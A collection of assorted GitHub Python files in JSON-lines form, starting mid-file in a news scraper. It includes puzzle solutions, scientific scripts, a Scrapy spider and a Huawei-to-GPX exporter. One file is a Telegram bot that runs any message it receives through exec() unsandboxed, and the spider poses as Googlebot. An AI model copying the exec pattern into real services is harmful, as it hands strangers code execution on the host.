len(news)):\r\n        text_1 += 
news[i].text\r\n F.go_url()\r\n item_list = F.control_dict['tag'](\"td\")\r\n item_list[index].click()\r\n F.control_dict['class']('inv-link' and 'text-secondary' and 'font-bold' and 'text-sm' and 'whitespace-normal', 1, 'click')\r\n if F.control_dict['class']('bp3-portal'):\r\n news = F.control_dict['class']('text-base')\r\n else:\r\n news = F.control_dict['class']('WYSIWYG' and 'articlePage')\r\n text_2 = ''\r\n for i in range(0, len(news)):\r\n text_2 += news[i].text\r\n F.go_url()\r\n item_list = F.control_dict['class'](\"td\")\r\n item_list[index].click()\r\n F.control_dict['class']('inv-link' and 'text-secondary' and 'font-bold' and 'text-sm' and 'whitespace-normal', 2, 'click')\r\n if F.control_dict['class']('bp3-portal'):\r\n news = F.control_dict['class']('text-base')\r\n else:\r\n news = F.control_dict['class']('WYSIWYG' and 'articlePage')\r\n text_3 = ''\r\n for i in range(0, len(news)):\r\n text_3 += news[i].text\r\n text = data_1, text_1, data_2, text_2, data_3, text_3\r\n print(text)\r\n F.go_url()\r\n index = index + 1\r\n item_list = F.control_dict['tag'](\"td\")\r\n last_price = item_list[index].text\r\n index = index + 1\r\n max_price = item_list[index].text\r\n index = index + 1\r\n min_price = item_list[index].text\r\n index = index + 1\r\n change = item_list[index].text\r\n index = index + 1\r\n percentage_change = item_list[index].text\r\n index = index + 1\r\n volume = item_list[index].text\r\n index = index + 1\r\n time = item_list[index].text\r\n index = index + 1\r\n print(name_company, last_price, max_price, min_price, change, percentage_change, volume, time)\r\n information = (\r\n f'{name_company}',\r\n f'{last_price}',\r\n f'{max_price}',\r\n f'{min_price}',\r\n f'{change}',\r\n f'{percentage_change}',\r\n f'{volume}',\r\n f'{time}',\r\n f'{text}'\r\n )\r\n F.import_sql('msd', information)\r\nelse:\r\n quit()\r\n","repo_name":"MichailRF/CompanyNews","sub_path":"AKompany.py","file_name":"AKompany.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29965863537","text":"\ndef is_economical(n):\n i = 2\n a = n\n factDict = {}\n while a > 1:\n if a % i == 0:\n if i not in factDict:\n factDict[i] = 1\n else:\n factDict[i] += 1\n a = a // i\n else:\n i += 1\n ctr = 0\n for k,v in factDict.items():\n ctr += len(str(k))\n if v != 1:\n ctr += len(str(v))\n \n if len(str(n)) > ctr:\n return 'Frugal'\n elif len(str(n)) == ctr:\n return 'Equidigital'\n else:\n return 'Wasteful'\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"XQwPPHE6ZSu4Er9ht_10.py","file_name":"XQwPPHE6ZSu4Er9ht_10.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9541581330","text":"# P1540 [NOIP2010 提高组] 机器翻译 https://www.luogu.com.cn/problem/P1540\n\nfrom collections import deque\nfrom typing import Deque\n\nM, N = map(int, input().split())\nmem: Deque[int] = deque()\nquery_times = 0\nfor word in map(int, input().split()):\n if word not in mem:\n query_times += 1\n if len(mem) >= M:\n mem.popleft()\n mem.append(word)\nprint(query_times)\n","repo_name":"frederick-wang/algorithm-exercises","sub_path":"luogu/P1540 [NOIP2010 提高组] 机器翻译/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11505319077","text":"#!/usr/bin/env python3\n\nimport pandas as 
pd\n\neuk5table = pd.read_csv('../phylogenetic_profiles.csv', index_col=\"Abbreviation\")\nspecies_abbrevs = euk5table.index.tolist()\n\nwith open('iTOL_label_names.txt', 'w') as f:\n    f.write('LABELS\\n')\n    f.write('SEPARATOR TAB\\n')\n    f.write('DATA\\n')\n    for abbrev in species_abbrevs:\n        species_name = euk5table.loc[abbrev]['Scientific name']\n        f.write(abbrev + '\\t' + species_name + '\\n')\n","repo_name":"jolienvanhooff/SMCevolution","sub_path":"py_scripts/itol_names.py","file_name":"itol_names.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38093623396","text":"#__author__ = 'wlarson'\n\nimport time\nfrom Looper import Looper\n\n# Success assumption\ngoal2030 = 3\n\n# Screen assumptions\nscreenRate = 0.5\nscreenTime = 1\nscreenCost = 0.1\nscreenHeadcount = 0\nscreenYearly = 5\nscreenAssumptions = [screenRate, screenTime, screenCost, screenHeadcount, screenYearly]\n\n# Evaluate assumptions\nevaluateRate = 0.75\nevaluateTime = 1\nevaluateCost = 1\nevaluateHeadcount = 0.33\nevaluateAssumptions = [evaluateRate, evaluateTime, evaluateCost, evaluateHeadcount]\n\n# Incubate assumptions\nincubateRate = 0.75\nincubateTime = 3\nincubateCost = 5\nincubateHeadcount = 3\nincubateAssumptions = [incubateRate, incubateTime, incubateCost, incubateHeadcount]\n\n# Accelerate assumptions\naccelerateRate = 0.25\naccelerateTime = 4\naccelerateCost = 10\naccelerateHeadcount = 5\naccelerateGrowth = 0.25\naccelerateAssumptions = [accelerateRate, accelerateTime, accelerateCost, accelerateHeadcount, accelerateGrowth]\n\n# Develop assumptions\ndevelopRate = 0.65\ndevelopTime = 5\ndevelopAssumptions = [developRate, developTime]\n\nt0 = time.time()\n\nscreenLimit = 40\nloopLimit = 1000\n\nloop = Looper(screenLimit, loopLimit, goal2030, screenAssumptions, evaluateAssumptions, incubateAssumptions, accelerateAssumptions, developAssumptions)\n\nloop.runLoop()\n\nprint(\"Successes: \" + str(loop.getAverageSuccesses()))\nprint(\"Screen: \" + str(loop.getAverageScreen()))\nprint(\"Evaluate: \" + str(loop.getAverageEvaluate()))\nprint(\"Incubate: \" + str(loop.getAverageIncubate()))\nprint(\"Accelerate: \" + str(loop.getAverageAccelerate()))\nprint(\"Develop: \" + str(loop.getAverageDevelop()))\nprint(\"Total budget: \" + str(loop.getAverageBudget()))\nprint(\"Peak budget: \" + str(loop.getPeakBudget()))\nprint(\"Peak headcount: \" + str(loop.getPeakHeadcount()))\nprint(\"Probability of succeeding: \" + str(loop.getProbability()))\n\nt1 = time.time() - t0","repo_name":"winstonlarson/venture_simulation","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20539743257","text":"import re\nimport urllib\nimport logging\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\nfrom keteritems import KeterMeta, Review, ReviewLoader\nimport urlparse\n\nfrom phantomjs import PhantomJS\n\nclass CanadiantireCaSpider(BaseSpider):\n    name = 'canadiantire.ca'\n    allowed_domains = ['canadiantire.ca', 'bazaarvoice.com']\n    user_agent = 'Googlebot/2.1 (+http://www.google.com/bot.html)'\n\n    def start_requests(self):\n        search_url = 
'http://www.canadiantire.ca/en/search-results.html?count=16&searchByTerm=true&viewMode=grid&q=%(brand)s'\n for brand in ('Keter', 'Suncast', 'Rubbermaid', 'Lifetime', 'Step 2', 'Step2', 'Sterilite'):\n yield Request(search_url % {'brand': urllib.quote(brand)},\n meta={'brand': brand}, callback=self.parse_product_list)\n\n # This search by brand skips valid products, suck\n def parse_search(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n brands = hxs.select(u'//h1[@class=\"ls-menu-block__header\" and contains(text(), \"Brand\")]'\n u'/following-sibling::ul[@class=\"ls-menu-block__list\"]/li')\n for brand in brands:\n brand_name = brand.select(u'./a/text()').extract()\n if brand_name[0].lower().startswith(response.meta['brand'].lower()):\n yield Request(urljoin_rfc(base_url, brand.select(u'./a/@href').extract()[0]),\n meta=response.meta, callback=self.parse_product_list)\n if not brands:\n for x in self.parse_product_list(response):\n yield x\n\n def parse_product_list(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n links = hxs.select(u'//h2/a/@href').extract()\n for url in links:\n url = urljoin_rfc(get_base_url(response), url)\n yield Request(url, meta=response.meta, callback=self.parse_product)\n\n pages = hxs.select('//li[@class=\"pagination\"]//a/@href').extract()\n if pages:\n # next_page = int(re.search(u'page=(\\d+)', response.url).group(1)) + 1\n # url = re.sub(u'page=(\\d+)', 'page=' + str(next_page), response.url)\n for page_url in pages:\n yield Request(urljoin_rfc(base_url, page_url),\n meta=response.meta,\n callback=self.parse_product_list)\n\n def parse_product(self, response):\n browser = PhantomJS()\n self.log('>>> BROWSER: GET => %s' % response.url)\n browser.get(response.url)\n self.log('>>> BROWSER: OK!')\n\n hxs = HtmlXPathSelector(text=browser.driver.page_source)\n\n browser.close()\n self.log('>>> BROWSER: Closed')\n\n sku = hxs.select(u'//*[@class=\"displaySkuCode\"]//text()').extract()\n\n sku = sku[0].replace('#', '')\n\n product_loader = ProductLoader(item=Product(), response=response)\n product_loader.add_xpath('name', u'//div[contains(@class,\"title\")]//h1/text()')\n product_loader.add_value('sku', sku)\n product_loader.add_xpath('category', u'//ul[contains(@class, \"pd-breadcrumbs\")]/li[2]/a/text()')\n product_loader.add_value('identifier', sku)\n price = hxs.select(u'//div[contains(@class, \"product-price__reg-price\")]/text()').extract()\n product_loader.add_value('price', price[0].replace('Reg.', ''))\n product_loader.add_value('brand', response.meta['brand'].lower())\n product_loader.add_value('url', response.url)\n image_url = hxs.select(u'/html/head/link[@rel=\"image_src\"]/@href').extract()\n if image_url:\n product_loader.add_value('image_url', image_url[0])\n product = product_loader.load_item()\n\n metadata = KeterMeta()\n metadata['brand'] = response.meta['brand']\n metadata['reviews'] = []\n product['metadata'] = metadata\n response.meta['product'] = product\n\n brand = response.meta['brand'].lower()\n if brand not in product['name'] and brand not in response.body.lower():\n return\n\n # http://www.canadiantire.ca/AST/browse/2/OutdoorLiving/3/OutdoorStorage/Sheds/PRD~0600292P/Keter+Rattan+Vertical+Shed.jsp?locale=en\n # http://canadiantire.ugc.bazaarvoice.com/9045/0600292P/reviews.djs?format=embeddedhtml\n # \n part1 = hxs.select(u'//script[starts-with(@src,\"http://canadiantire.ugc.bazaarvoice.com/static/\")]/@src').extract()[0].split('/')[-2]\n part2 = 
hxs.select('//div[@id=\"bazaarVoiceConfig\"]/@data-product-code').extract()[0]\n\n yield Request('http://canadiantire.ugc.bazaarvoice.com/%s/%s/reviews.djs?format=embeddedhtml' % (part1, part2),\n meta=response.meta, callback=self.parse_review_js)\n\n def parse_review_js(self, response):\n for line in response.body.split('\\n'):\n if line.startswith('var materials='):\n body = line.lstrip('var materials=').rstrip(',')\n break\n\n try:\n body = eval(body)\n except:\n logging.error('Failed to parse: ' + repr(response.body))\n\n # Emulate \"normal\" HTML response\n body = ('' +\n '%s' +\n '') % (body['BVRRSourceID'].replace('\\\\/', '/'))\n\n response2 = HtmlResponse(url=response.url, body=body)\n response2.request = response.request\n\n for x in self.parse_review(response2):\n yield x\n\n def parse_review(self, response):\n hxs = HtmlXPathSelector(response)\n product = response.meta['product']\n\n for review in hxs.select(u'//div[starts-with(@id, \"BVRRDisplayContentReviewID_\")]'):\n review_loader = ReviewLoader(item=Review(), selector=review, date_format=\"%B %d, %Y\")\n review_loader.add_value('date', review.select(u'.//span[contains(@class,\"BVRRReviewDate\")]/text()').extract()[1])\n\n title = review.select(u'.//span[contains(@class,\"BVRRCustomFullTitle\")]/text()').extract()\n text = ' '.join(review.select(u'.//span[contains(@class,\"BVRRReviewText\")]/text()').extract())\n\n if title:\n full_text = title[0] + '\\n' + text\n else:\n full_text = text\n\n pros = review.select(u'.//span[contains(@class,\"BVRRReviewProTags\")]/span/text()').extract()\n cons = review.select(u'.//span[contains(@class,\"BVRRReviewConTags\")]/span/text()').extract()\n if pros:\n full_text += '\\nPros: ' + ', '.join(pros)\n if cons:\n full_text += '\\nCons: ' + ', '.join(cons)\n\n review_loader.add_value('full_text', full_text)\n rating = review.select(u'.//img[@class=\"BVImgOrSprite\"]/@title').extract()[0]\n review_loader.add_value('rating', rating.split()[0])\n review_loader.add_value('url', response.url)\n\n product['metadata']['reviews'].append(review_loader.load_item())\n\n next_url = hxs.select(u'//a[contains(@name,\"BV_TrackingTag_Review_Display_NextPage\")]/@data-bvjsref').extract()\n if next_url:\n yield Request(next_url[0],\n meta=response.meta, callback=self.parse_review_js)\n\n else:\n yield product\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/keter/canadiantire_ca.py","file_name":"canadiantire_ca.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37428539641","text":"import numpy as np\nimport logging\nfrom .glyph import Glyph\n\nlogger = logging.getLogger(__name__)\nlogi = logger.info\nlogd = logger.debug\n\n\ndef do_combine(self, other):\n \"\"\"\n\n :param Bantry self:\n :param Bantry other:\n0 :return:\n \"\"\"\n score, yell = 0, \"\"\n s, t = self.best_char, other.best_char\n ss, st = self.strength(), other.strength()\n\n suspects = ['ఏ', '-', '\"', \"'\", '.', 'ై',]\n ghpsshh = 'ఘపసషహఎ'\n heads = ['ి', 'ీ', 'ె', 'ే', '✓', '్']\n def is_sharer(c):\n return c[0] in heads or \\\n c is 'ై' or \\\n c in 'ఖఙజఞణ'\n\n lowprob = np.log(.95)\n vlprob = np.log(.70)\n if other is Space:\n return False\n else:\n return True\n\n # Strong rules resulting in immediate failure\n if s in heads and t[0] not in ghpsshh:\n score += 5\n yell += '*PSHG'\n\n # Weak rules, that help each other\n if self.area < self.xarea/4:\n score += 1\n yell += '+AREAS'\n if 
other.area < self.xarea/4:\n        score += 1\n        yell += '+AREAO'\n\n    overlap = self.overlap(other)\n    if overlap > .75:\n        score += 1\n        yell += '+OVLP:{:.0f}'.format(100*overlap)\n\n    if t in suspects:\n        score += 1\n        yell += '+SUSPO'\n\n    if s in suspects:\n        score += 1\n        yell += '+SUSPS'\n\n    if not is_sharer(s) and not is_sharer(t) and overlap > .5:\n        score += 2\n        yell += '#OLNS'\n\n    try:\n        self.ngram[self.best_char, other.best_char]\n    except KeyError:\n        yell += '+DICT'\n        score += 1\n\n    if ss < vlprob:\n        score += 1\n        yell += '+VLPS{:.0f}'.format(100*np.exp(ss))\n\n    if st < vlprob:\n        score += 1\n        yell += '+VLPO{:.0f}'.format(100*np.exp(st))\n\n    if (ss < lowprob) and (st < lowprob):\n        score += 1\n        yell += '+LOWP{:.0f}&{:.0f}'.format(100*np.exp(ss), 100*np.exp(st))\n\n    if score > 1:\n        combined_area = self.combined_area(other)\n        if combined_area < 3 * self.xarea:\n            logi(\"Combining 'cos: \" + yell)\n            return score > 1\n        else:\n            logi(\"Combined Area too big: {}>3*{}\".format(combined_area, self.xarea))\n\n\nclass Bantry(Glyph):\n    \"\"\"Class used to process a space separated line and store the probable\n    characters and the respective likelihoods for one glyph.\n    \"\"\"\n    scaler = lambda *_: None\n    classifier = lambda *_: ((\"\", 0),)\n    ngram = ()\n\n    def __init__(self, bantry_str=None):\n        super().__init__(bantry_str)\n        if bantry_str:\n            self.scaled = self.scaler(self)\n            self.likelies = self.classifier(self.scaled)\n            logd(\"Initialized\\n{}\".format(self))\n\n    @property\n    def best_char(self):\n        return max(self.likelies, key=lambda x: x[1])[0]\n\n    def strength(self):\n        return max(self.likelies, key=lambda x: x[1])[1]\n\n    @property\n    def strlikelies(self):\n        return \" \".join(\"{}{:.4f}\".format(char, np.exp(lik)) for char, lik in self.likelies)\n\n    def __str__(self):\n        return super().__str__() + \"\\n\" + self.strlikelies\n\n    def __repr__(self):\n        return \"({}: {})\".format(self.best_char,\n            int(100*np.exp(self.strength())))\n\n    def combine(self, other):\n        logd(\"Checking to combine\\n{}\\n{}\".format(self, other))\n\n        if do_combine(self, other):\n            combined = self + other\n            combined.scaled = self.scaler(combined)\n            combined.likelies = self.classifier(combined.scaled)\n            if logger.isEnabledFor(logging.DEBUG):\n                logi(\"Combining\\n{}\".format(combined))\n            else:\n                logi(\"Combining\\n{}\\n{}\\n{}\".format(self, other, combined))\n\n            return True, combined\n        else:\n            return False, None\n\n\nclass MetaSpace(type):\n    def __repr__(self):\n        return \"Space\"\n\n\nclass Space(metaclass=MetaSpace):\n    __metaclass__ = MetaSpace\n    likelies = [(\" \", 0)]\n    strlikelies = \" : 0\"\n    best_char = \" \"\n    strength = lambda: 0\n    scaled = \"---\\n| |\\n---\"\n\n    @classmethod\n    def combine(cls, other):\n        return False, None\n\n\nclass BantryFile():\n    def __init__(self, name):\n        in_file = open(name)\n        self.file_bantries = []\n\n        iword, iline = 0, 0\n        line_bantries = []\n\n        for bantry_str in in_file:\n            e = Bantry(bantry_str)\n            if e.linenum == iline:\n                if e.wordnum > iword:\n                    iword = e.wordnum\n                    line_bantries.append(Space)\n                line_bantries.append(e)\n\n            elif e.linenum > iline:\n                self.file_bantries.append(line_bantries)\n                iword = 0\n                iline += 1\n                while iline < e.linenum:\n                    self.file_bantries.append([])\n                    iline += 1\n                line_bantries = [e]\n\n            else:\n                raise ValueError(\"Line number can not go down.\")\n\n        self.file_bantries.append(line_bantries)\n        self.num_lines = len(self.file_bantries)\n\n        self.text = \"\"\n        for bantries_inline in self.file_bantries:\n            for bantree in bantries_inline:\n                self.text += bantree.best_char\n            self.text += 
\"\\n\"\n\n in_file.close()\n\n def get_line_bantires(self, i):\n return self.file_bantries[i]\n\nif __name__ == \"__main__\":\n import sys\n from scaler import ScalerFactory\n\n banti_file_name = sys.argv[1] if len(sys.argv) > 1 else \"sample_images/praasa.box\"\n scaler_prms_file = sys.argv[2] if len(sys.argv) > 2 else \"scalings/relative48.scl\"\n\n Bantry.scaler = ScalerFactory(scaler_prms_file)\n bf = BantryFile(banti_file_name)\n\n for linenum in range(bf.num_lines):\n print('*' * 60)\n line_bantries = bf.get_line_bantires(linenum)\n for bantry in line_bantries:\n print(bantry.scaled)","repo_name":"TeluguOCR/datagen_duo","sub_path":"generator/banti/bantry.py","file_name":"bantry.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39363063805","text":"from kmeans_gpu import KMeans\r\nfrom tqdm import tqdm as tqdm\r\nimport torch\r\nimport random\r\n\r\n# Config\r\nbatch_size = 128\r\nfeature_dim = 1024\r\npts_dim = 3\r\nnum_pts = 256\r\nnum_cluster = 15\r\n\r\ncycle_range = random.randrange(20, 80, 20)\r\n\r\nfor i in tqdm(range(cycle_range)):\r\n # Create data\r\n features = torch.randn(batch_size, feature_dim, num_pts).to(\"cuda\")\r\n # Pay attention to the different dimension order between features and points.\r\n points = torch.randn(batch_size, num_pts, pts_dim).to(\"cuda\")\r\n\r\n # Create KMeans Module\r\n kmeans = KMeans(\r\n n_clusters=num_cluster,\r\n max_iter=100,\r\n tolerance=1e-4,\r\n distance='euclidean',\r\n sub_sampling=None,\r\n max_neighbors=15,\r\n )\r\n\r\n # Forward\r\n centroids, features = kmeans(points, features)\r\n\r\n # output:\r\n # >>> torch.Size([128, 15, 3]) torch.Size([128, 1024, 15])","repo_name":"Rachel-Finley/Thermal-and-Energy-Modeling","sub_path":"Benchmarks/K_MEANS_GPU_TEST.py","file_name":"K_MEANS_GPU_TEST.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11351561279","text":"import descarteslabs as dl\n\ngdelt = list(filter(lambda fc: 'gdelt' in fc.name, dl.vectors.FeatureCollection.list()))\nprint(\"Available GDELT tables:\")\nprint(gdelt)\n\n\nfc = dl.vectors.FeatureCollection(gdelt[0].id) \n\n\nplaces = dl.Places()\nresults = places.search('nairobi')\n\n\nslug = results[0]['slug']\n\nplace = places.shape(slug)\n\nshape = place['geometry']\n\nfc = fc.filter(geometry=shape)\nprint(list(fc.features()))","repo_name":"karla-dl/tutorials","sub_path":"python_examples/gdelt.py","file_name":"gdelt.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14590676268","text":"from io import StringIO\r\nimport contextlib\r\n\r\n@contextlib.contextmanager\r\ndef stdoutIO(stdout=None):\r\n old = sys.stdout\r\n if stdout is None:\r\n stdout = StringIO()\r\n sys.stdout = stdout\r\n yield stdout\r\n sys.stdout = old\r\n\r\nimport sys\r\nimport time\r\nimport pprint\r\nimport telepot\r\n\r\ndef handle(msg):\r\n content_type, chat_type, chat_id = telepot.glance(msg)\r\n print (content_type, chat_type, chat_id, msg['chat']['username'])\r\n print(msg['text'])\r\n\r\n if content_type == 'text':\r\n if msg['text'] == '/start':\r\n bot.sendMessage(chat_id, \"\"\"Type your code...\\n\r\nNote that python language is case sensitive!\\n\r\nTry these commands:\r\n print('Hello World')\r\n x = 2\r\n print(x)\r\n for i in range(10): print(i)\r\nor any desired 
code!\"\"\")\r\n elif msg['text'] == '/stop':\r\n bot.sendMessage(chat_id, 'Bye :(')\r\n else:\r\n #bot.sendMessage(chat_id, \"Python Code:\\n\" + msg['text'])\r\n code = msg['text']\r\n flag = True;\r\n with stdoutIO() as screen:\r\n try:\r\n exec(code)\r\n except Exception as exception:\r\n flag = False\r\n error = str(exception)\r\n print(error)\r\n\r\n result = screen.getvalue()\r\n if ((result.find('name') != -1) and (result.find('is not defined') != -1) and result != result.lower()):\r\n result += '\\n' + '-May help you: Python language is case sensitive!'\r\n if flag:\r\n output = '>>> Result\\n'\r\n else:\r\n output = '>>> Error\\n'\r\n\r\n #max_line = max([len(line) for line in result.split('\\n')])\r\n #if max_line < 12:\r\n # max_line = 12\r\n #elif max_line > 40:\r\n # max_line = 40\r\n #for i in range(max_line):\r\n # output = output + '_'\r\n output += '\\n' + result\r\n bot.sendMessage(chat_id, output)\r\n\r\n if content_type != 'text':\r\n bot.sendMessage(chat_id, \"\"\"It is not even a text, let alone a python code!\\n\r\nPlease send a TEXT content!\"\"\")\r\n\r\n\r\n# Getting the token from command-line is better than embedding it in code,\r\n# because tokens are supposed to be kept secret.\r\nTOKEN = ' '\r\n\r\nbot = telepot.Bot(TOKEN)\r\nbot.message_loop(handle)\r\nprint ('Listening ...')\r\n\r\n# Keep the program running.\r\nwhile 1:\r\n time.sleep(1)\r\n\r\n","repo_name":"hejazizo/Python-Compile-Telegram-Bot","sub_path":"python_compile_bot.py","file_name":"python_compile_bot.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"24012775354","text":"'''\nSolution - the primary idea is that the lcs of s and reversed s gives the longest palindromic\nsubsequence. 
This needs to be thought through and reviewed.\n'''\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n\n def longestCommonSubsequence(s1,s2):\n m = len(s1)\n n = len(s2)\n dt = [[0]*(n+1) for _ in range(m+1)]\n\n for row in range(m):\n for col in range(n):\n if s1[row]==s2[col]:\n dt[row+1][col+1] = dt[row][col] + 1\n else:\n dt[row+1][col+1] = max(dt[row][col+1],dt[row+1][col])\n \n return dt[m][n]\n \n revs=''\n for i in reversed(range(len(s))):\n revs = revs+s[i] \n \n return longestCommonSubsequence(s,revs)\n\n\n\n\n\n ","repo_name":"satyajitghosh/learningPy","sub_path":"neetcode/DynamicProg/LargestPalindromicSubsequence.py","file_name":"LargestPalindromicSubsequence.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"70883556252","text":"\"\"\"alter nodes add column latest version\n\nRevision ID: 230f8ce9c90f\nRevises: 8320b1c62d9\nCreate Date: 2012-07-17 20:32:54.466145\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '230f8ce9c90f'\ndown_revision = '8320b1c62d9'\n\nfrom alembic import op, context\nfrom sqlalchemy.sql import table, column\n\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.add_column('nodes', sa.Column('latest_version', sa.INTEGER))\n\n n = table(\n 'nodes',\n column('node', sa.Integer),\n column('latest_version', sa.Integer)\n )\n v = table(\n 'versions',\n column('node', sa.Integer),\n column('mtime', sa.Integer),\n column('serial', sa.Integer),\n )\n\n s = sa.select(\n [v.c.serial]).where(n.c.node == v.c.node).order_by(v.c.mtime).limit(1)\n op.execute(\n n.update().\n values({'latest_version': s})\n )\n\n\ndef downgrade():\n op.drop_column('nodes', 'latest_version')\n","repo_name":"grnet/synnefo","sub_path":"snf-pithos-backend/pithos/backends/lib/sqlalchemy/alembic/versions/230f8ce9c90f_alter_nodes_add_colu.py","file_name":"230f8ce9c90f_alter_nodes_add_colu.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} {"seq_id":"38481324943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport argparse\nimport time\nimport pandas as pd\n\n\nNAME = 'exportGPX'\nDESCRIPTION = 'a command line tool to export Huawei tracking \\\nfiles to GPX files'\nDEBUG = False\n\n\ndef debug(message):\n \"\"\" Print debug message\n \"\"\"\n if DEBUG:\n print(message)\n\n\ndef normalize_timestamp(timestamp):\n \"\"\" Normalize timestamp to seconds since epoch\n \"\"\"\n if (str(timestamp).find('E12') >= 0 or\n len(str(int(float(timestamp)))) == 13):\n timestamp = int(float(timestamp) / 1000.0)\n else:\n timestamp = int(float(timestamp))\n return timestamp\n\n\ndef sec_to_datetime(timestamp):\n \"\"\" Convert seconds since epoch to a date and time\n \"\"\"\n return time.strftime(\"%d/%m/%Y %H:%M:%S %Z\", time.localtime(timestamp))\n\n\ndef sec_to_date(timestamp):\n \"\"\" Convert seconds since epoch to a date\n \"\"\"\n return time.strftime(\"%d/%m/%Y\", time.localtime(timestamp))\n\n\ndef sec_to_time(timestamp):\n \"\"\" Convert seconds since epoch to a time\n \"\"\"\n return time.strftime(\"%H:%M:%S\", time.localtime(timestamp))\n\n\ndef milli_to_datetime(timestamp):\n \"\"\" Convert milliseconds since epoch to a date and time\n \"\"\"\n return sec_to_datetime(int(timestamp)/1000)\n\n\ndef milli_to_date(timestamp):\n \"\"\" Convert milliseconds since epoch to a date\n \"\"\"\n return 
sec_to_date(int(timestamp)/1000)\n\n\ndef milli_to_time(timestamp):\n \"\"\" Convert milliseconds since epoch to a time\n \"\"\"\n return sec_to_time(int(timestamp)/1000)\n\n\ndef gpx_header():\n \"\"\" Return gpx valid header\n \"\"\"\n return \"\"\"\\\n\n\n \n \"\"\"\n\n\ndef gpx_footer():\n \"\"\" Return gpx valid footer\n \"\"\"\n return \"\"\"\\\n\n \n \n\"\"\"\n\n\ndef point(infos):\n \"\"\" Return gpx valid checkpoint with coordinates given\n \"\"\"\n if (str(infos.get('lat', '0')) == \"90.0\" and\n str(infos.get('lon', '0')) == \"-80.0\"):\n return \"\\r\\n\\\n \\r\\n\\\n \"\n else:\n return \"\\r\\n\\\n \\r\\n\\\n \" + str(infos.get('alt', '0')) + \"\\r\\n\\\n \\r\\n\\\n \\r\\n\\\n \\r\\n\\\n \" + str(int(infos.get('heart_rate', 0)))\\\n + \"\\r\\n\\\n \" + str(infos.get('vitesse', 0))\\\n + \"\\r\\n\\\n \\r\\n\\\n \\r\\n\\\n \"\n\n\ndef get_datas(file_in):\n \"\"\" Return pandas dataframe with all information\n \"\"\"\n debug('Opening ' + file_in + '...')\n with open(file_in, 'r') as f_in:\n debug('Reading data...')\n lbs, heart_rate, cad, pace_minute = [], [], [], []\n speed_per_seconde, beat_per_minute, alt = [], [], []\n for line in f_in:\n dic = {}\n infos = line.split(';')\n type_data = infos[0].split('=')[1]\n k = int(infos[1].split('=')[1])\n if type_data == 'lbs':\n # Location per second\n dic['lat'] = float(infos[2].split('=')[1])\n dic['lon'] = float(infos[3].split('=')[1])\n# dic['alt'] = float(infos[4].split('=')[1])\n dic['t'] = normalize_timestamp(infos[5].split('=')[1])\n lbs.append(dic)\n else:\n value = int(float(infos[2].split('=')[1]))\n if type_data == 'p-m':\n # Pace / Minutes\n dic['m'] = int(k) // 10000 # Nb meters since start\n dic['s'] = value # Nb seconds to do 1000 meters\n dic['pace'] = str(int(value) // 60) + \"'\"\\\n + str(int(value) % 60) + '\"'\n pace_minute.append(dic)\n elif type_data == 'b-p-m':\n # Beats per minute ?\n dic['k'] = k\n dic['value'] = value\n beat_per_minute.append(dic)\n elif type_data == 'h-r':\n # Heart Rate\n dic['t'] = normalize_timestamp(k)\n dic['heart_rate'] = value\n heart_rate.append(dic)\n elif type_data == 's-r':\n # Stride Rate\n dic['t'] = normalize_timestamp(k)\n dic['stride'] = value\n cad.append(dic)\n elif type_data == 'rs':\n # Speed per second\n dic['s'] = k # Nb seconds since start\n dic['m'] = value # Speed in nb decimeters per second\n dic['speed'] = int(value) / 10 * 3600 / 1000\n speed_per_seconde.append(dic)\n elif type_data == 'alti':\n # Alt\n dic['t'] = normalize_timestamp(k)\n dic['alt'] = value\n alt.append(dic)\n else:\n debug('Data type unknown: ' + type_data)\n\n dataframe = pd.DataFrame(lbs).sort_values(by=['t'], ascending=True)\n dataframe = pd.merge(dataframe, pd.DataFrame(heart_rate),\n on='t', how='outer')\n dataframe = pd.merge(dataframe, pd.DataFrame(alt), on='t',\n how='outer')\n dataframe['s'] = dataframe.index\n dataframe = dataframe[dataframe['lat'].notnull()]\\\n .sort_values(by=['t'], ascending=True)\n dataframe = dataframe[dataframe['lat'] != 